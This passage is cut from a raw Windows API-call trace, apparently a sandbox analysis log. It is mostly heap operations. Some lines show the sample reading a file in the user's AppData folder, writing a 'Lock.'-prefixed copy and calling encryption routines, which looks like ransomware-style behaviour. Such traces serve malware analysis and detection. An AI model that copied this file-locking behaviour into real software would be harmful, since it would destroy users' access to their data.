hHeap=0x970000) returned 1 [0232.303] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0232.303] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514d8 | out: hHeap=0x970000) returned 1 [0232.303] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51508 | out: hHeap=0x970000) returned 1 [0232.303] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51430 | out: hHeap=0x970000) returned 1 [0232.303] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51478 | out: hHeap=0x970000) returned 1 [0232.303] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51580 | out: hHeap=0x970000) returned 1 [0232.303] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512f8 | out: hHeap=0x970000) returned 1 [0232.303] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51490 | out: hHeap=0x970000) returned 1 [0232.303] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51448 | out: hHeap=0x970000) returned 1 [0232.303] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514c0 | out: hHeap=0x970000) returned 1 [0232.303] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51388 | out: hHeap=0x970000) returned 1 [0232.303] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51550 | out: hHeap=0x970000) returned 1 [0232.303] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51328 | out: hHeap=0x970000) returned 1 [0232.303] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51538 | out: hHeap=0x970000) returned 1 [0232.303] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513a0 | out: hHeap=0x970000) returned 1 [0232.303] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51520 | out: hHeap=0x970000) returned 1 [0232.303] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514a8 | out: hHeap=0x970000) returned 1 [0232.303] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515b0 | out: hHeap=0x970000) returned 1 [0232.303] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512e0 | out: hHeap=0x970000) returned 1 [0232.303] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512c8 | out: hHeap=0x970000) returned 1 [0232.303] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51370 | out: hHeap=0x970000) returned 1 [0232.303] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78bb8 | out: hHeap=0x970000) returned 1 [0232.303] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0232.303] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514f0 | out: hHeap=0x970000) returned 1 [0232.303] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51568 | out: hHeap=0x970000) returned 1 [0232.303] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51418 | out: hHeap=0x970000) returned 1 [0232.303] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0232.303] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977ae8 | out: hHeap=0x970000) returned 1 [0232.304] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69bc8 | out: hHeap=0x970000) returned 1 [0232.304] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51598 | out: hHeap=0x970000) returned 1 [0232.304] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51400 | out: hHeap=0x970000) returned 1 [0232.304] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51460 | out: hHeap=0x970000) returned 1 [0232.304] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699a8 | out: hHeap=0x970000) returned 1 [0232.304] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0232.304] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978490 | out: hHeap=0x970000) returned 1 [0232.304] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978490 [0232.304] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e56588 | out: hHeap=0x970000) returned 1 [0232.304] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0232.304] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55098 [0232.304] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550a8 [0232.304] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55038 [0232.304] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69bc8 [0232.304] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f88 [0232.304] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0232.304] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0232.304] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69bc8 | out: hHeap=0x970000) returned 1 [0232.304] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0232.304] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0232.304] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77788 [0232.304] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0232.304] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77788 | out: hHeap=0x970000) returned 1 [0232.304] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0232.304] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55098 [0232.304] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0232.304] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51010 | out: hHeap=0x970000) returned 1 [0232.304] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0232.304] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51130 | out: hHeap=0x970000) returned 1 [0232.304] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0232.305] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fb8 [0232.305] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0232.305] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0232.305] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0232.305] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04460 | out: hHeap=0x970000) returned 1 [0232.305] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0232.305] PeekMessageW (in: lpMsg=0x8cef40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef40) returned 0 [0232.305] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0232.305] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0232.305] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x2e69a08, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0232.305] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514c0 | out: hHeap=0x970000) returned 1 [0232.305] CryptDestroyHash (hHash=0xa872d0) returned 1 [0232.306] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0232.306] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0232.306] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0232.306] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a48 | out: hHeap=0x970000) returned 1 [0232.306] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0232.306] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77808 | out: hHeap=0x970000) returned 1 [0232.306] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0232.306] CreateFileW (lpFileName="C:\\Users\\FD1HVy/AppData/Roaming/Hr9y61oAkM-K.flv" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\hr9y61oakm-k.flv"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2a0 [0232.306] SetFilePointerEx (in: hFile=0x2a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0232.306] SetFilePointerEx (in: hFile=0x2a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8cf2c0 | out: lpNewFilePointer=0x0) returned 1 [0232.306] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69b48 [0232.306] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50da0 | out: hHeap=0x970000) returned 1 [0232.306] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50488 | out: hHeap=0x970000) returned 1 [0232.306] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50db8 | out: hHeap=0x970000) returned 1 [0232.307] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50638 | out: hHeap=0x970000) returned 1 [0232.307] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0232.307] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e78 | out: hHeap=0x970000) returned 1 [0232.307] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c48 | out: hHeap=0x970000) returned 1 [0232.307] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ef0 | out: hHeap=0x970000) returned 1 [0232.307] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0232.307] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c48 [0232.307] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c48 | out: hHeap=0x970000) returned 1 [0232.307] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77788 [0232.307] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0232.307] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77788 | out: hHeap=0x970000) returned 1 [0232.307] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0232.307] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cf8 [0232.307] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f80 [0232.307] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50de8 [0232.307] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c48 [0232.307] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e00 [0232.307] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c48 | out: hHeap=0x970000) returned 1 [0232.307] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cc8 [0232.307] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c48 [0232.307] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c48 | out: hHeap=0x970000) returned 1 [0232.307] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50da0 [0232.307] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c48 [0232.307] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x90) returned 0x2e56588 [0232.307] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50da0 | out: hHeap=0x970000) returned 1 [0232.307] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy/AppData/Roaming/" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming")) returned 0x10 [0232.307] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e56588 | out: hHeap=0x970000) returned 1 [0232.308] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c48 | out: hHeap=0x970000) returned 1 [0232.308] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77788 [0232.308] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10000) returned 0x2f04810 [0232.309] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50db8 [0232.309] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c48 [0232.309] CreateFileW (lpFileName="C:\\Users\\FD1HVy/AppData/Roaming/Lock.Hr9y61oAkM-K.flv" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\lock.hr9y61oakm-k.flv"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2d0 [0232.309] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e699e8 [0232.309] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e00 | out: hHeap=0x970000) returned 1 [0232.309] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50de8 | out: hHeap=0x970000) returned 1 [0232.309] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cc8 | out: hHeap=0x970000) returned 1 [0232.309] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f80 | out: hHeap=0x970000) returned 1 [0232.309] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0232.309] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50440 | out: hHeap=0x970000) returned 1 [0232.309] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0232.309] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f50 | out: hHeap=0x970000) returned 1 [0232.309] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0232.309] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cf8 [0232.309] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0232.310] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77808 [0232.310] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0232.310] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77808 | out: hHeap=0x970000) returned 1 [0232.310] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0232.310] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77808 [0232.310] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0232.310] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cb8 [0232.310] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f20 [0232.310] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e48 [0232.310] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cf8 [0232.310] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0232.310] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e18 [0232.310] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cf8 [0232.310] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0232.310] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69be8 [0232.310] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69be8 | out: hHeap=0x970000) returned 1 [0232.310] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0232.310] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0232.310] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e60 [0232.310] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cc8 [0232.310] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cf8 [0232.310] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x100000) returned 0xe51020 [0232.314] SetFilePointerEx (in: hFile=0x2a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8cf4e4 | out: lpNewFilePointer=0x0) returned 1 [0232.314] ReadFile (in: hFile=0x2a0, lpBuffer=0x3be0dd0, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x3be0dd0*, lpNumberOfBytesRead=0x8cf4f8*=0x10000, lpOverlapped=0x0) returned 1 [0232.317] ReadFile (in: hFile=0x2a0, lpBuffer=0x3be0dd0, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x3be0dd0*, lpNumberOfBytesRead=0x8cf4f8*=0x40f4, lpOverlapped=0x0) returned 1 [0232.318] ReadFile (in: hFile=0x2a0, lpBuffer=0x3be0dd0, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x3be0dd0*, lpNumberOfBytesRead=0x8cf4f8*=0x0, lpOverlapped=0x0) returned 1 [0232.318] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cc8 | out: hHeap=0x970000) returned 1 [0232.318] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0232.318] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e60 | out: hHeap=0x970000) returned 1 [0232.318] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cf8 [0232.318] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x140f4) returned 0x2f14818 [0232.320] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0xe51020 | out: hHeap=0x970000) returned 1 [0232.323] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e48 | out: hHeap=0x970000) returned 1 [0232.323] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e18 | out: hHeap=0x970000) returned 1 [0232.323] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f20 | out: hHeap=0x970000) returned 1 [0232.323] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0232.323] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fb0 | out: hHeap=0x970000) returned 1 [0232.323] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b28 | out: hHeap=0x970000) returned 1 [0232.323] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d10 | out: hHeap=0x970000) returned 1 [0232.323] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cb8 [0232.323] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x140f4) returned 0x2f28918 [0232.325] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f14818 | out: hHeap=0x970000) returned 1 [0232.325] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0232.325] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0232.325] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cf8 [0232.325] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f50 [0232.325] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50de8 [0232.325] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b28 [0232.325] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0232.325] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x140f4) returned 0x2f14818 [0232.325] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b28 | out: hHeap=0x970000) returned 1 [0232.325] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f14818 | out: hHeap=0x970000) returned 1 [0232.325] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0232.325] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50de8 | out: hHeap=0x970000) returned 1 [0232.325] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f50 | out: hHeap=0x970000) returned 1 [0232.325] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0232.326] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0232.326] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cf8 [0232.326] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b28 [0232.326] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a28 [0232.326] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a28 | out: hHeap=0x970000) returned 1 [0232.326] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b28 | out: hHeap=0x970000) returned 1 [0232.326] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0232.326] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77888 [0232.326] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0232.326] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cf8 [0232.326] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f04658 [0232.326] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b28 [0232.326] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0232.326] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04658 | out: hHeap=0x970000) returned 1 [0232.326] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b28 | out: hHeap=0x970000) returned 1 [0232.326] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e78 [0232.326] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54b28 [0232.326] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f80 [0232.326] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d10 [0232.326] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0232.326] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0232.326] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x140f4) returned 0x2f14818 [0232.326] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0232.326] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54d18 [0232.326] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ef0 [0232.326] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f88 [0232.326] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0232.326] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54f18 [0232.327] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e90 [0232.327] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55068 [0232.327] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0232.327] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 